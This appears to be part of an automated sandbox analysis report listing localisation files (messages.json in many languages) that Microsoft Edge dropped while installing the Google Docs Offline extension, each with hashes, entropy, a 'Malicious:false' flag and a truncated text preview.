                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2771
                                                                                                                                                                                                                                                                        Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                        MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                        SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                        SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                        SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):858
                                                                                                                                                                                                                                                                        Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                        MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                        SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                        SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                        SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):954
                                                                                                                                                                                                                                                                        Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                        MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                        SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                        SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                        SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):899
                                                                                                                                                                                                                                                                        Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                        MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                        SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                        SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                        SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2230
                                                                                                                                                                                                                                                                        Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                        MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                        SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                        SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                        SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1160
                                                                                                                                                                                                                                                                        Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                        MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                        SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                        SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                        SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3264
                                                                                                                                                                                                                                                                        Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                        MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                        SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                        SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                        SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3235
                                                                                                                                                                                                                                                                        Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                        MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                        SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                        SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                        SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3122
                                                                                                                                                                                                                                                                        Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                        MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                        SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                        SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                        SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1895
                                                                                                                                                                                                                                                                        Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                        MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                        SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                        SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                        SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1042
                                                                                                                                                                                                                                                                        Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                        MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                        SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                        SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                        SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2535
                                                                                                                                                                                                                                                                        Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                        MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                        SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                        SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                        SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                        Malicious:false
